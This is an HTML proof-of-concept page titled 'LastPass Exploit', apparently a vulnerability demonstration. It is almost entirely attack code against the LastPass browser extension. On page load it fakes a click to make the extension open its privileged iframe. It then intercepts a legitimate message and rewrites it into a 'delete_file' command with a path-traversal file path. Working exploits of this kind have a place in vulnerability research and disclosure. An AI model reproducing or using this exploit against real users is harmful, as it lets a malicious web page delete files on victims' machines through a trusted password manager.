1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<html>
<head>
    <title>LastPass Exploit</title>
    <script>
    // Trick LastPass intro drawing a privileged iframe by dispatching a
    // MouseEvent with the correct co-ordinates.
    function trigger_frame() {
        var el  = document.getElementsByTagName("input")[0];
        var pos = el.getBoundingClientRect();

        // Approx? I dunno
        el.dispatchEvent(new MouseEvent("click", {
            clientX: pos.width + pos.x - 16,
            clientY: pos.height + pos.y - 12,
        }));
    }

    // PiggyBack on a legitimate message and overwrite it with our own message.
    function modify_message(a) {
        a.data.messagetype = "delete_file";
        a.data.f="../../../../../../example.txt";

        // Cleanup
        window.removeEventListener("message", modify_message);
    }

    // Insert my own EventListener
    window.addEventListener("message", modify_message);

    </script>
</head>
<body onload="setTimeout(trigger_frame, 2000)">
    <input type=text name=username>
</body>
</html>